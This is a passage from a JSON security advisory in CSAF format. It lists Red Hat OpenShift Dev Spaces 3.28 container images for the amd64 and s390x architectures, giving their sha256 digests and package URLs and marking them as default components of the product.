"purl": "pkg:oci/configbump-rhel9@sha256%3A5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/configbump-rhel9\u0026tag=1780548550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"product": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256%3A1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/dashboard-rhel9\u0026tag=1780685176"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"product": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256%3A2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/imagepuller-rhel9\u0026tag=1780573614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"product": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"product_id": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3A0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/jetbrains-ide-rhel9\u0026tag=1780608672"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"product": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"product_id": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-redirector-rhel9@sha256%3Abaff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/multicluster-redirector-rhel9\u0026tag=1780695724"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"product": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openvsx-rhel9@sha256%3Ab73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/openvsx-rhel9\u0026tag=1780948325"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256%3Add4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/devspaces-rhel9-operator\u0026tag=1780592394"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"product_id": "registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-operator-bundle@sha256%3Af78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/devspaces-operator-bundle\u0026tag=1780937740"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"product": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256%3A80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/pluginregistry-rhel9\u0026tag=1780696380"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"product": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256%3A56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/server-rhel9\u0026tag=1780694994"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"product": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256%3A6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/traefik-rhel9\u0026tag=1780593759"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"product": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256%3A80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/udi-rhel9\u0026tag=1780929707"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel10@sha256%3Ac10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/udi-base-rhel10\u0026tag=1780600267"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256%3A2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411?arch=amd64\u0026repository_url=registry.redhat.io/devspaces/udi-base-rhel9\u0026tag=1780601703"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"product": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"product_id": "registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/code-rhel9@sha256%3A83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/code-rhel9\u0026tag=1780679565"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"product": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"product_id": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/code-sshd-rhel9@sha256%3A82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/code-sshd-rhel9\u0026tag=1780678593"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"product": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"product_id": "registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/configbump-rhel9@sha256%3A62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/configbump-rhel9\u0026tag=1780548550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"product": {
"name": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"product_id": "registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x",
"product_identification_helper": {
"purl": "pkg:oci/dashboard-rhel9@sha256%3Aae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/dashboard-rhel9\u0026tag=1780685176"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"product": {
"name": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"product_id": "registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/imagepuller-rhel9@sha256%3A5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/imagepuller-rhel9\u0026tag=1780573614"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"product": {
"name": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"product_id": "registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x",
"product_identification_helper": {
"purl": "pkg:oci/jetbrains-ide-rhel9@sha256%3A25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/jetbrains-ide-rhel9\u0026tag=1780608672"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"product": {
"name": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"product_id": "registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-redirector-rhel9@sha256%3Ae9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/multicluster-redirector-rhel9\u0026tag=1780695724"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"product": {
"name": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"product_id": "registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openvsx-rhel9@sha256%3Acef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/openvsx-rhel9\u0026tag=1780948325"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"product": {
"name": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"product_id": "registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/devspaces-rhel9-operator@sha256%3Aa5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/devspaces-rhel9-operator\u0026tag=1780592394"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"product": {
"name": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"product_id": "registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/pluginregistry-rhel9@sha256%3Aa062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/pluginregistry-rhel9\u0026tag=1780696380"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"product": {
"name": "registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"product_id": "registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/server-rhel9@sha256%3Af8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/server-rhel9\u0026tag=1780694994"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"product": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"product_id": "registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/traefik-rhel9@sha256%3A1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/traefik-rhel9\u0026tag=1780593759"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"product": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"product_id": "registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x",
"product_identification_helper": {
"purl": "pkg:oci/udi-rhel9@sha256%3A2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/udi-rhel9\u0026tag=1780929707"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel10@sha256%3A1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/udi-base-rhel10\u0026tag=1780600267"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"product": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"product_id": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/udi-base-rhel9@sha256%3A06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b?arch=s390x\u0026repository_url=registry.redhat.io/devspaces/udi-base-rhel9\u0026tag=1780601703"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64"
},
"product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x"
},
"product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64"
},
"product_reference": "registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64"
},
"product_reference": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x"
},
"product_reference": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64"
},
"product_reference": "registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64 as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64"
},
"product_reference": "registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.28"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x as a component of Red Hat OpenShift Dev Spaces 3.28",
"product_id": "Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x"
},
